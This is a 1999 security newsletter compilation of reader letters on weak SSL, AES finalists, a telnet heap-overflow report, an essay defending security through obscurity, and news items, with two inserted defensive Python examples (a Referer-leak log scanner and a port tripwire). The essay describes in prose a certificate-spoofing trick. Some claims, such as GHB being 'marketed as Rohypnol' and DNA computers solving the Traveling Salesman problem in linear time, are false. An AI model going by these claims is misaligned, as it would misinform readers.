It says something completely wrong. That was a useful collection of basic bungles. Don't forget the other type, using an HTTPS page that's got sensitive data in query params for its URL, and an http://... link that'll cause that sensitive data to be logged in what are usually insecure logfiles. (No current examples handy -- but if you see one of those, it's classic!)

From: David Crick
Subject: SSL at BT

British Telecom (BT) are another company with worrying views on Internet security. You'd think with their image and standing that they could do better. Their e-services Web page [www.bthome.com/e_services/index_sh.html] allows home users to check and amend various account details and services. But despite the spread of strong crypto Web-browsers [www.opera.com] and security upgrades for IE, Windows and Netscape [www.replay.com], BT only chose to use 40-bit SSL. This is accompanied by the following endorsement and warning:

"When ordering goods and services make sure the Web site you are using uses a 'Secure Socket Layer (SSL)' session. The BT Shop - At Home uses such sessions from the moment you start to place an order."

Also: "If you are still uneasy about using the Web to order on-line then you should use an alternative method of ordering."

Hardly inspiring, is it? It also makes one dubious about their "Secure Site Programme":

"Trustwise Secure Sites use a BT Secure Server certificate to establish proof of identity of the owner of the Web site and enable secure communication between the Web site and visitors to that site.

"BT carefully checks the identity of the organization that owns the Web site and verifies that the Web site is registered to that organization. The BT Trustwise Secure Site Programme allows you to learn more about the Web sites you visit before you submit any sensitive or confidential information."

Again, I could only find 40-bit SSL in operation, despite the "Trustwise" logo [e.g. see http://www.bt.com/Talk/].
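The second bungle in David Brownell's letter above (sensitive data in an HTTPS page's query string, carried by the Referer header into some other site's logs) can be spotted from the receiving side. The following is an added example, not code from the newsletter or its correspondents: it scans combined-format access-log lines for https:// referers that carry query parameters and reports the parameter names, never the values; the log lines are constructed and the host names are placeholders.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" access-log format; the Referer is the third quoted field.
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def leaked_params(referer):
    """Names of the query parameters a Referer header gave away, or [].

    Only an https:// referer carrying a query string counts: that is exactly
    the case where data the user submitted over TLS has just been written,
    in the clear, into some other (often plaintext) site's access log.
    Values are deliberately not returned, so a report does not re-leak them.
    """
    try:
        parts = urlsplit(referer)
    except ValueError:
        return []
    if parts.scheme.lower() != "https" or not parts.query:
        return []
    return [name for name, _value in parse_qsl(parts.query, keep_blank_values=True)]


def scan_log(lines):
    """Scan combined-format log lines; return one finding per leaking hit."""
    findings = []
    for line in lines:
        match = COMBINED_RE.match(line.rstrip("\n"))
        if not match:
            continue  # not a combined-format line, skip it
        names = leaked_params(match.group("referer"))
        if names:
            findings.append({
                "client": match.group("client"),
                "time": match.group("time"),
                "referer_host": urlsplit(match.group("referer")).netloc,
                "params": names,
            })
    return findings


# Constructed sample lines (not real traffic): only the first one leaks.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Aug/1999:10:15:32 +0000] "GET /images/logo.gif HTTP/1.0" '
    '200 1234 "https://bank.example/account?acct=12345678&pin=4321" "Mozilla/4.0"',
    '203.0.113.8 - - [21/Aug/1999:10:16:01 +0000] "GET /story.html HTTP/1.0" '
    '200 5120 "http://news.example/index?page=2" "Mozilla/4.0"',
    '203.0.113.9 - - [21/Aug/1999:10:16:40 +0000] "GET / HTTP/1.0" '
    '200 880 "https://bank.example/home" "Mozilla/4.0"',
    '203.0.113.10 - - [21/Aug/1999:10:17:05 +0000] "GET / HTTP/1.0" 200 880 "-" "Lynx/2.8"',
    "this line is not in combined format and is skipped",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} leaked {hit['params']} from {hit['referer_host']}")
```

Run against the logs of any plaintext site you operate, a hit names the HTTPS site that is putting secrets in its URLs; the fix belongs on that site (POST bodies or session state instead of query parameters), not in the log.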
From: Ross Anderson
Subject: AES

NIST has just announced that the finalists in the Advanced Encryption Standard competition are MARS, RC6, Rijndael, Serpent and Twofish. That makes three U.S. algorithms, one Belgian, and one which I developed in collaboration with colleagues in Israel and Norway.

It may be of interest that, under the export controls on intangibles which England's DTI pushed in their recent White Paper and which they are now trying to have adopted as an EU regulation, I would have needed a personal export licence from the DTI in order to do this work. It seems somewhat unlikely that a licence would have been granted. Arms exporters complain to me that DTI officials are notorious for blocking licences to punish them for such 'offences' as complaining about the licensing process. So perhaps I would have not done the work; perhaps I'd have defied the law and now be involved in a huge test case in the European Court; perhaps I'd have emigrated; perhaps we'd just not do research in collaboration with foreigners. Who knows?

** *** ***** ******* *********** *************

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com.

Please feel free to forward CRYPTO-GRAM to colleagues and friends who will find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is founder and CTO of Counterpane Internet Security Inc., the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.
He is a frequent writer and lecturer on cryptography. Counterpane Internet Security, Inc. is a venture-funded company bringing innovative managed security solutions to the enterprise. http://www.counterpane.com/

Copyright (c) 1999 by Bruce Schneier

ISN is sponsored by Security-Focus.COM

@HWA

10.0 TELNET.EXE HEAP OVERFLOW
~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by BHZ, Tuesday 17th August 1999 on 10:51 pm CET

Jeremy Kothe reported to BugTraq about Heap Overflow in windows 98 Telnet.exe. "This version of Telnet (77824 bytes, 11th May 98) has a bug which allows a heap overrun. It assumes that the first command-line argument will be <255 chars when preparing for the "Connect Failed" message-box. The result is that a few crucial bytes can be written over, which, as the telnet app is closing, allow full execution of arbitrary code". Read the details here. Valentin Perelogin also posted that Windows'95 telnet.exe (74,720Kb) is also exploitable.

@HWA

11.0 SECURITY THROUGH OBSCURITY VS FULL DISCLOSURE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Tuesday 17th August 1999 on 9:30 pm CET

This Slashdot feature deals with two views on security: security through obscurity, which relies on the ignorance of attackers rather than the strength of defenders, and the opposing full disclosure approach. This paper suggests security through obscurity can and does work in certain strictly limited ways, and should not be eliminated unthinkingly from the admin's arsenal. It further implies that the boundaries between STO and 'real' security are blurry and deserve evaluation. Interesting reading to say the least.

Complete story http://slashdot.org/features/99/08/17/1327246.shtml

Obscurity as Security
Posted by CmdrTaco on Tuesday August 17, @10:00AM EDT
from the saaay-wait-a-minute dept.
Matthew Priestley has taken a break from slaving for the man to write us a piece where he takes on the conventional wisdom that Security through Obscurity isn't secure at all, and tries to argue that sometimes it is.

The following was written by Slashdot Reader Matthew Priestley

Disclaimer: The author of this paper works for Microsoft, but his opinions may not be those of Microsoft. In fact, they aren't. The author hereby declares that nobody important is even aware of his existence and that the closest he has ever come to plotting with Bill Gates on the Master Plan was when they used adjacent urinals this one time. The author did not peek.

0 Introduction

With the popularity of the open-source mindset, a general contempt has drizzled upon all forms of obscurity. The concept of security through obscurity (STO) in particular has been decimated. Security through obscurity, which relies on the ignorance of attackers rather than the strength of defenders, is dead in all but practice. The victory of the opposing full disclosure approach is so complete that proposed tactics die at the mere hint they are a form of STO. This paper suggests security through obscurity can and does work in certain strictly limited ways, and should not be eliminated unthinkingly from the admin's arsenal. It further implies that the boundaries between STO and 'real' security are blurry and deserve evaluation. However, this paper in no way proposes obscurity as a method for keeping secrets in the long term.

1 Full disclosure does not apply to instantiated data

Instantiated data - the data used by specific instances of an algorithm - do not fall within the scope of full disclosure. Were this not so, then even the simplest password would violate the ban on security through obscurity. Passwords are secrets known only to their creators, and password entry is commonly obscured, as in the case of the 'shadow' login of UNIX.
While the login protocol may be open, passwords themselves are a form of STO, with obscurity localized in the password string. Instantiated data are exempt from full disclosure because the risk from their failure is limited. When a script cracks a password, the damage done to the secure system extends only as far as that password's scope. The cracker cannot use the compromised string to gain power directly in another system, even if that system runs the same password protocol. Nor can anything be inferred about the value of one password merely from the value of another with equal or lower permissions.

A similar example of instantiated data obscurity is the private key that forms the basis of asymmetric cryptography. So obscure is this information that it is rare for even the owner to be familiar with its precise value. But such obscurity is a necessary element of modern security schemes. Strong security does not eliminate obscurity - rather, it localizes obscurity to instantiated data. The phrase in cryptology, 'carry all security in the key' might be better phrased 'carry all obscurity in the key'.

2 Full disclosure does not apply to time-limited secrets

Secrets that expire after a short lifetime can be protected by a wider array of techniques than long-standing secrets. The defense of information that will be irrelevant in a matter of hours or days may not warrant fully peer-reviewed security. Consider the famous Navajo code-talkers of World War II. Among the Americans coordinating the attack against Japanese-held islands in the Pacific were a number of Navajo Indians, who spoke a slangy version of the complex Navajo tongue. Commands from HQ were issued through these code-talkers, who encrypted and decrypted with an alacrity that belittled the automated methods of the day. This is an excellent example of time-limited security through obscurity.
Secret languages are excellent security in the short-term, but however cryptic Navajo may be, it is a code subject to human betrayal. Use of Navajo against the Japanese much beyond the 3-year window of the war would have been unwise. But because the secrets of American strategy in the Pacific were irrelevant after the conclusion of the fighting, the long-term weakness of obscure Navajo as a security measure was unimportant.

3 Obscurity serves as a tripwire

Perhaps the classic example of wrongheaded STO is the administrator who modifies his web server to listen on a nonstandard port - thereby confusing attackers, as the theory goes. Considering the degree to which tasks such as port scanning can be automated, the naivete of this defense seems plain. The cracker might be forced to check all 64512 unreserved ports, but eventually the concealed web server will be found. This appears to be a weakness of STO, but if manipulated correctly, it is in fact a great strength.

Imagine that our same admin had also invoked a tripwire script and set it to listen on one or more unused ports. When the tripwire is probed with a SYN packet from a cracker trying to locate the web server, instantly the system goes to full alert. The packet is logged and the admin's pager sounds like an alarm.

Such tripwire approaches work because they do not expect obscurity to keep information hidden. Rather, they obscure information as a ploy to force invaders into showing their hand. Because the obscured implementation differs on each system, crackers must resort to guess-check scanning before attacks can commence. But tripwires are deployed throughout the system, anticipating this very move. Running an automated kit suddenly becomes a risky proposition, and even talented crackers must gamble on, for example, whether 'root' is really the name of the primary account or merely a hotline to the authorities.

Lighthearted implementations of this approach are a staple in the popular "Indiana Jones" films.
In one scene, Jones is confronted with a hallway of lettered tiles, all seemingly alike. To cross safely he must step only on those tiles with letters corresponding to the secret word 'Jehovah'. The penalty for a misstep is to crash through the floor and plummet into a gaping pit. Attackers not privy to the password would find an exhaustive search less than optimal in this case.

When traps are mingled with genuine data, STO can be a powerful disincentive. Such measures do not make a given machine resistant to breach in the long term, any more than medieval moats could ultimately protect their castles. But like moats, tripwire obscurity provides a critical buffer against attackers, allowing defenders room to breathe.

4 Asymmetric cryptography exhibits traits of STO

Despite the notion that asymmetric cryptography such as RSA is 'real' security, in some aspects these methods resemble STO. Indeed, this entire class of cryptography is founded on the hopeful guess that a certain mathematical problem is intractable. The back door into cryptographic methods that rely on multiplying primes is, quite simply, to develop a swift means of factoring those multiples. This NP-time problem must be solved before a private key can be derived from its corresponding public key, and the notorious difficulty of NP problems leads some supporters to characterize asymmetric cryptography as 'provably secure'. This is far from the case - there is uncertainty among mathematicians as to whether this problem will even prove non-trivial once approached from the right angle. Startling progress has been made in solving similar 'impossible' problems using innovative ploys - for example, DNA computers can now solve the Traveling Salesman problem in linear time. Given that asymmetric encryption is used widely in the world's e-commerce infrastructure, the repercussions when this piece of obscurity is cracked are disturbing to contemplate.
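Returning to the port tripwire of section 3 above: this is an added example of mine, not part of Priestley's article. It binds a set of ports that carry no real service (the port numbers are assumptions, chosen to be unused), logs every connection attempt, and escalates to an alert when one source touches several tripwire ports inside a short window, which is the guess-check scan the article says an attacker is forced into.

```python
import selectors
import socket
import time
from collections import defaultdict


class Tripwire:
    """Listeners on ports that carry no real service.

    Nothing legitimate ever connects to these ports, so every accepted
    connection is a probe: it is always logged, and a source that touches
    several tripwire ports within a short window (the guess-check scan an
    attacker needs to locate a hidden service) raises an alert.
    """

    def __init__(self, ports, scan_threshold=3, window_seconds=60):
        self.ports = sorted(set(ports))        # assumed-unused port numbers
        self.scan_threshold = scan_threshold   # distinct ports before alerting
        self.window = window_seconds
        self.events = []                       # (timestamp, src_ip, port)
        self._ports_hit = defaultdict(set)     # src_ip -> tripwire ports touched
        self._window_start = {}                # src_ip -> start of current window

    def record(self, src_ip, port, now=None):
        """Record one probe and return the verdict: "alert" or "log".

        Hitting the same port twice counts as one port, so a single retried
        connection cannot trip the scan threshold by itself.
        """
        now = time.time() if now is None else now
        start = self._window_start.get(src_ip)
        if start is None or now - start > self.window:
            # no recent activity from this source: open a fresh window
            self._window_start[src_ip] = now
            self._ports_hit[src_ip] = set()
        self._ports_hit[src_ip].add(port)
        self.events.append((now, src_ip, port))
        if len(self._ports_hit[src_ip]) >= self.scan_threshold:
            return "alert"
        return "log"

    def serve(self, bind_addr="0.0.0.0", notify=print):
        """Bind every tripwire port and loop forever.

        Each accepted connection is closed at once; the record is the point,
        not the service. `notify` receives the line for alerts (swap in a
        pager or syslog call); plain probes go to stdout.
        """
        sel = selectors.DefaultSelector()
        for port in self.ports:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            sock.bind((bind_addr, port))
            sock.listen(8)
            sock.setblocking(False)
            sel.register(sock, selectors.EVENT_READ, data=port)
        while True:
            for key, _mask in sel.select():
                conn, (src_ip, src_port) = key.fileobj.accept()
                conn.close()
                verdict = self.record(src_ip, key.data)
                stamp = time.strftime("%Y-%m-%d %H:%M:%S")
                line = f"{stamp} tripwire port {key.data} probed from {src_ip}:{src_port} [{verdict}]"
                if verdict == "alert":
                    notify(line)
                else:
                    print(line)


if __name__ == "__main__":
    # Port numbers are assumptions: pick ports nothing on the host really uses.
    Tripwire([8001, 8002, 8003, 8004]).serve()
```

Because accept() only fires on a completed handshake, the bare SYN probe the article mentions (a half-open scan) would need a packet capture rather than a socket listener; and keep the tripwire ports disjoint from the real service's port so a legitimate client never lands on one.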
One telling argument against STO is that it promotes a false sense of security, leading admins into complacency. But the complexity of asymmetric cryptography, combined with reports of its infallibility, can produce much the same effect. Consider this social-engineering exploit of digital signing. Using a tool such as makecert, the cracker generates a root certificate with the name 'Verisign Class 1 Primary CA' and uses it to sign an end-entity certificate with the subject 'CN=Rob Malda, E=malda@slashdot.org' (CT:Please don't. I'm used to posers pretending to be me in Quake, but not on email ;) The cracker then sends the email to an enemy, using a client that does not validate e-mail addresses and spoofing the return address friendly name. The inexpert recipient, thinking all is in order and knowing that digital signatures never lie, trusts the root certificate and henceforth carries on a conversation with a false CmdrTaco. Only scrutiny of the headers will reveal the mail is actually going to a different address. The widely made claim that public-key cryptography is 'real' security and completely unrelated to 'false' STO delivers a more powerful illusion of security than anything an XOR'd password file can provide.

Even brute-force cryptanalysis has parallels in STO. Suppose we wish to conceal the passwords for a number of Swedish bank accounts. We resolve to write them to a secret location on our hard drive, perhaps a few unused bytes in a file sector. Only we, who know the lucky offset, can read the data. This form of concealment is a typical case of security through obscurity. The integrity of our secret depends on the ignorance of the cracker, and a trial of all 2^n possible locations compromises the system. But in what way is this fundamentally different from the 'genuine' security of n-bit encryption? To break this form of security, 2^n keys are generated and tried against the cipher text until the result is a plain body.
Is the difference between this 'true' security and the 'false' STO merely that n is considerably larger in encryption than in the case of hard drives? But this implies that our real error lay, not in reliance upon obscurity, but in having a hard drive of insufficient size!

5 Conclusions

Security in the absence of obscurity is not strictly possible, but good systems both localize and advertise their points of obscurity. When the admin is fully aware of the obscurity in a system, tripwires and instantiated data can provide a useful complement to more rigorous security techniques. Obscurity cannot keep information safe or concealed for long, but it can make attacks risky and destroy the effectiveness of automatic kits. These benefits should not be dismissed as an article of faith.

@HWA

12.0 THE MUSIC INDUSTRIES' "CYBER-SHERIFF"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Tuesday 17th August 1999 on 9:00 pm CET

The growing number of illegal MP3 copies of copyrighted songs that are distributed across the Net is becoming an increasingly big problem for the music industry. Here's an interview with RIAA Executive Director Hilary Rosen on this matter.

Read the interview below
http://www.businessweek.com/bwdaily/dnflash/aug1999/nf90817b.htm

Music and the Net: A Chat with the Industry's Cyber Sheriff
RIAA Executive Director Hilary Rosen sings a tune you might not expect

"When the music's over, turn out the lights" crooned the Doors' Jim Morrison some 30 years ago. Today, the dirge is a fitting take on how Net pioneers regard the lumbering record industry, which they almost giddily hope will be toppled by the Web's ability to sort and transmit digital music for sale online. In recent months, the industry's vulnerability has been underscored by the stunning growth of MP3 files -- many of which are record companies' own copyrighted songs uploaded sub rosa onto illegal trading posts. The record companies have a sheriff, of course.
She's Hilary Rosen, long-time executive director of the 47-year-old Recording Industry Association of America. While the industry undergoes painful, and sometimes enlightening change, it's Rosen's responsibility to keep order. The hastily formed Secure Digital Music Initiative, for instance, is an effort by the major record and technology companies to stop illegal duplication of copyrighted material. Beyond this squabbling over standards, Rosen must also help record companies confront a larger question: Will they even matter 20 years from now? Looking for answers, Business Week staff editor Dennis Berman chatted with Rosen recently. Here's an edited transcript of their conversation:

Q: How would you describe the state of mind of a big chunk of your consumers, namely young people who are growing up on the Internet, where so many of the products and services are free?

A: I don't think the concept of music being free is new. I think the shift is how consumer expectations of getting products through the Internet has built up as a free activity. But I actually don't think it's as big a problem as some people might expect me to think. We know consumers want music. And we know they want it online, and I'm grateful to the MP3 phenomenon for showing the music community just how badly [consumers] do want it. They're willing to spend all that time and energy to download in the most difficult, complex, time-consuming, incompatible ways. I mean, have you downloaded MP3 files? It's a pain. It's not really easy. It's hard to choose the thing, you don't really get the sample. It's not easy. So if they're willing to go through that much trouble to get music, I'm completely convinced that if an artist offers them a fresh version of the highest sound quality with the lyrics packaged, then consumers want to pay for that. It will be easy, it will be compatible.
Q: What business lessons do you think record companies -- habitually criticized as being slow and lumbering and profiteering -- have learned from the Internet?

A: I think No. 1 would be that record companies were traditionally forced into the box of seeing the retailer as their customer, because the retailers bought the records and then sold them to the consumer. Whereas, the Internet has given both the record companies and the artists a direct relationship with their fans. That's probably the most significant thing. We have a small member company label called Astralwerks. It's a great label, great energy. Their relationship with the Chemical Brothers [a techno group] is so intense that they now have their marketing plan for the new Chemical Brothers release suggested to them by the fans whom they have Web relationships with. Gimmick, yes, but extraordinarily appealing. [Now] people communicate with you about real research, not just a bunch of guys in gray suits telling you what they perceive their phone bankers have learned -- but real research. So, I think that's No. 1 -- that it is fundamentally changing the relationships that exist between the music consumer and the providers of the music.

I think one other thing, and that is the sort of value equation about music use. It used to be that there was one business model, they sold records. So, all of their investment and marketing or promotion and tour support, and whatever they did with an artist, had to be made up in a record sale. With the Web, you have the opportunity for a real variety of business models, driven by the consumer. That means you don't have to make a million dollars selling the whole album.
If you make $100,000 here selling the album, and $100,000 dollars in licensing fees for a track on an online jukebox, and then another $100,000 doing your licensing for a Webcast, then the multiple revenue streams really allow you to take a lot more risks -- on music that might not otherwise be as profitable, and that you wouldn't, therefore, take the risk on.

Q: What do you worry most about?

A: I think it's interesting how labels can sustain major artists' increasing desires -- and deserved desires -- for more and more money, with limited capitalization in some of the more entrenched companies. And I guess it's sort of how do you get the infusion of cash that you need, and then, what do you do with that cash?

Q: How do you feel about losing the suit against Diamond Multimedia [the first company to develop a mobile player for MP3 files. The RIAA sued Diamond, claiming that its technology allowed for illegal use of copyrighted material.]

A: Somebody asked me if we'd bring the Diamond suit again. As recently as 18 months ago when this suit was brought, the whole world was different.

Q: How was it different?

A: The technology industry didn't come to the table with any level of understanding for the creative community -- that the products were being considered as ways to exploit the music, not expand it. At the time, it was the best judgment call that was made, that we could make.

Q: So, you regret it now?

A: No. What I regret is that it sends a signal about our attitude, which I think is incorrect. It was never the strategy, it was just a part of the strategy. Concepts like SDMI and bringing people together has always been the strategy. And the RIAA, unfortunately, jumped out of the box there.

Q: One thing that seems to be missing is artists' involvement. Artists saying, "Hey, you know, we put out this music that means so much in your life, we deserve to be paid for it. We certainly don't deserve to be ripped off."
Why don't we see more artists making those statements?

A: I think artists don't like to be perceived as getting into controversy -- they're about their music, they're about their relationships with their fans. I think that given the way that this was positioned in the press over the last two years -- artists vs. fans, artists vs. record companies -- anytime somebody said something, they were taking sides. I think that has been tough. But I will tell you, I get calls from artists and managers every day asking us to take stuff off a Web site. If artists were every day telling me, "You know, we don't believe in what you're doing, we think this should all be free. We don't care about our stuff being protected," I'd go find another job. They don't, as a rule, feel that way. As a rule, they pretty much feel like they should get compensated. Artists, a lot of artists, deserve to be, need to be, want to be seen as technology-friendly. And I think if we can provide a safe space for them to be able to do that and still protect their interests, that's O.K.

Q: If you had to draw a pie chart of how you spend your time, I guess the Internet is taking a bigger piece of the pie. How has that changed over the last two years?

A: I would say that four years ago, it was 10%, and now it's 90%. It's a lot. Although I've had a heavy six months on violence in music, too. Music has always represented some social rebellion, and the Internet has become a socially rebellious child, in essence, for a lot of mainstream business and parents. For everybody else who is used to a certain way of life, the Internet is just banging on their door, just like that nasty rock and roll that you wish would leave your daughter alone.

Q: So over time, the Internet may put more power into independent labels? In the next couple of years, the independents may take more of the pie?

A: I actually don't think that the pie stays the same size. I think the pie expands.
Q: How long does it take record companies to realize that?

A: Maybe it took a minute longer than it took every other smart person in the world, but they're there. The majors take a lot of knocks for being slow to come to this thing. And, you know, some of it deservedly so. But I think that also a business reporter would understand this because, they're sitting on billions of dollars of assets on behalf of artists and their companies. [Nearly] 99% of their sales are still in bricks and mortar retail. That's a huge responsibility, [and explains] the concept that they were a little more thoughtful about how to go forward in this space than a kid changing the world, sitting in his mom's bedroom with his own computer.

@HWA

13.0 ReDaTtAcK CHARGED ANYWAYS
~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Tuesday 17th August 1999 on 8:35 pm CET

ISP Belgacom Skynet, which was compromised by the hacker ReDaTtAcK last week, has after an initial statement that they wouldn't press charges decided to do a 180 and charge him anyways. This is after the hacker sent the ISP a fax himself to inform them about the holes in their systems.

@HWA

14.0 NA/MCAFEE RELEASES NEW VIRUS SERVICE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Tuesday 17th August 1999 on 3:05 am CET

Network Associates will this week unveil its ActiveShield service, which will deliver anti-virus software updates to users' computers whenever they are connected to the Internet. In this way users will receive fixes as soon as they are made available. Read more

--------------------------------------------------------------
This story was printed from Inter@ctive Week, located at http://www.zdnet.com/intweek.
--------------------------------------------------------------

McAfee Launches New Virus Service
By Mel Duvall, Inter@ctive Week
August 16, 1999 1:15 PM PT
URL: http://www.zdnet.com/intweek/stories/news/0,4164,2315320,00.html

Network Associates will unveil technology this week that it said will revolutionize the process of keeping computers updated with the latest anti-virus software.

The security firm's McAfee division will launch its ActiveShield service through its McAfee.com Web site, which will deliver anti-virus software updates to users' computers whenever they are connected to the Internet.

Anthony Kim, manager of McAfee Clinic, said the software has the potential to limit the damage caused by such outbreaks as the Melissa virus, because users will receive fixes as soon as they are available.

The ActiveShield software pings the McAfee server daily to check for software updates, patches or fixes. It gives the user the option of downloading and installing the fix, or doing it at a later date.

McAfee will price ActiveShield at $39.95 for a yearly subscription. But, for a limited time, it will be $19.95.

@HWA

15.0 TWO CHARGED WITH PROMOTING "DATE-RAPE" DRUG ON THE NET
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Tuesday 17th August 1999 on 2:50 am CET

Two men have been charged by the Michigan attorney general in connection with allegedly promoting the sale and at-home manufacture of the "date-rape" drug. Attorney General Jennifer M. Granholm, D, also said the two men have been filed with notice to stop within 10 days the sale of the so-called "kits" to make the drug, or face additional criminal charges and penalties of up to 90 days in jail, a $5,000 fine, or both. For now they have been charged with one count of solicitation to manufacture a controlled substance and face a maximum of 30 years in jail if convicted.
Newsbytes
Two Charged With Promoting Date-Rape Drug Via The Net
http://www.newsbytes.com/pubNews/99/134907.html
By Bob Woods, Newsbytes
LANSING, MICHIGAN, U.S.A., 16 Aug 1999, 3:21 PM CST

Two men who live outside Michigan have been charged by that state's attorney general in connection with allegedly promoting the sale and at-home manufacture of the controversial drug gamma-hydroxybutyrate (GHB), better known as the "date-rape drug."

Attorney General Jennifer M. Granholm, D, also said the two men have been filed with notice to stop within 10 days the sale of the so-called "kits" to make the drug, or face additional criminal charges and penalties of up to 90 days in jail, a $5,000 fine, or both.

The action marks the first time a criminal prosecution has been initiated as a result of selling GHB over the Internet, attorney general spokesperson Chris DeWitt told Newsbytes today.

Both Carl Gorton, 63, of Merritt Island, Fla., and John Hedrick, 22, of Colorado Springs, Co., were charged with one count of solicitation to manufacture a controlled substance. Charges were filed in 36th Judicial District Court in Detroit. Gorton and Hedrick now face felony charges and a maximum penalty of 30 years in jail, if convicted. Gorton was at large as of this afternoon, while Hedrick had been arrested and is now out on bond, DeWitt said.

GHB, which is marketed as Rohypnol, is also known as roofies, liquid ecstasy, liquid X and organic Quaalude, among other names. A 2-milligram (mg) dose of GHB can result in unconsciousness within 20 minutes of ingestion, usually through a drink laced with the drug. The next morning, the person who took the drug has no memory of the previous evening's events.

Gorton and Hedrick "knowingly and intentionally" solicited undercover agents from the attorney general office's new High Tech Crime Unit to make GHB through the sale of a "do-it-yourself" GHB ingredient kit, authorities say.
A Website owned by Gorton allegedly advocated and encouraged the use of GHB, and stated that the company can offer "legally available GHB" because it has "concluded that the chemical components could be sold as a kit and combined by customers at home without special equipment, all of which is safe and perfectly legal," Granholm's office also said.

"Selling a dangerous, controlled substance on the Internet doesn't make it safe, and it certainly doesn't make it legal," Granholm said in a statement.

The alleged action occurred via the Website sponsored by "Centurian Aging Research Laboratory" (CARL). The CARL Website included an order form that directed customers to send cash or money orders to a post office box registered to Hedrick, the attorney general's office also said. The Website is no longer active, DeWitt said.

GHB, under Michigan law, is a Schedule 1 controlled substance, which makes it illegal to use, manufacture or possess the drug in the Wolverine State. Soliciting or inducing the manufacture of such controlled substances is also illegal.

DeWitt said the attorney general was within the scope of her office to go after the two suspects. "It would be no different if someone called a person in Indiana to buy heroin, and it was then shipped (to Michigan)," he said.

Granholm's High Tech Crime Unit is made up of three assistant attorneys general, one investigator, and support staff, DeWitt said. The team, which is a part of the attorney general office's criminal division, deals with illegal activities conducted via the Internet on both a criminal and civil basis. "With the Internet becoming more and more available, there are those who will take advantage of other people," he added.

Reported By Newsbytes.com, http://www.newsbytes.com
15:21 CST
Reposted 16:51 CST

@HWA

16.0 E-COMMERCE AND PRIVACY
     ~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Tuesday 17th August 1999 on 2:45 am CET

NFO Interactive conducted a survey on how netizens feel about e-commerce and privacy. The survey polled more than 4,500 Internet users, of which 1,944 had never made an online purchase. Nearly 70 percent of that number would make online purchases if they had assurances that their privacy would be guaranteed. More on this survey:

Online Consumers Demand E-Commerce Privacy - Study
http://www.newsbytes.com/pubNews/99/134914.html
By David McGuire, Newsbytes
WASHINGTON, DC, U.S.A., 16 Aug 1999, 4:19 PM CST

The majority of Internet users who are not currently participating in e-commerce would be more likely to make purchases online if they felt comfortable that their privacy would be guaranteed, a soon-to-be-released study found.

Nearly 70 percent of those netizens who have yet to make an Internet purchase would be enticed to do so if they had assurances that their privacy would be protected, the survey found.

Conducted by NFO Interactive, the survey polled more than 4,500 Internet users. Nearly half of those polled (1,944) had never made an online purchase.

"It's going to be the (online) merchant's responsibility to educate the users" about privacy protections, NFO Director of Research Tim Washer told Newsbytes today.

Other factors that reticent Internet users said would encourage them to make purchases online included deeper price discounts (65 percent) and the ability to return defective or unwanted products to a physical location (28 percent).

Washer also stressed the potential value of independent online privacy "seal-of-approval" programs, such as those offered by Truste and BBBOnLine. By funding, promoting and participating in those programs, e-merchants could help ameliorate some consumer concerns about privacy, he contended.
Among the attributes survey participants said would attract them to a retail Website were: strong privacy protection standards; access to secure purchasing servers; overall technical reliability; up-to-date content; and timely delivery.

The NFO study comes on the heels of another survey, released last week, that indicated nearly a third of all Internet users make purchases online. That survey, conducted by CDB Research & Consulting, found that apprehension about online shopping is dissipating as e-commerce sites improve security procedures and make information about security more readily available.

Further information on the NFO study, "Online Retail Monitor: Branding, Segmentation & Web Sites", is available on NFO's Website, located at http://www.nfoi.com/nfointeractive/nfoipr81699.asp

Reported by Newsbytes.com, http://www.newsbytes.com

16:19 CST
Reposted 16:53 CST

17.0 IDENTITY-THEFT
     ~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Tuesday 17th August 1999 on 2:30 am CET

Anyone seen the Net? Infoworld has a story on identity-theft, people who instead of stealing from you, "become you". Your name, social security number, driver's license number, credit record.. all can easily be hijacked. "It would never happen to me" is a common response, but according to this article more than 500,000 people fall victim to this "social engineering attack" in the US every year.

Infoworld
August 16, 1999

Future criminals will not need to steal from you -- they will simply `become you'

What would you say if we told you that we could "become you" if we wanted? Establish (or ruin) your credit, cash checks, obtain a driver's license or passport, even commit crimes -- all in your name. The sad fact is that your name, social security number, driver's license number, credit record -- essentially what defines you in modern society -- can be easily hijacked. "It would never happen to me" is a common response to what seems inconceivable.
The fact is, every year in the United States more than 500,000 people fall victim to this social engineering attack. And it can be one of the most invasive, exhaustive experiences you'll ever endure.

Why do so many people each year fall prey to the identity-theft vultures of the world? Simply put, we're too trusting. We preprint our home addresses (and even our driver's license numbers) on our checks. We give out our home phone number to anyone who asks. We throw sensitive bills, as well as bank and credit statements, in the trash. The bottom line is that we, as a society, make it too easy to become victims.

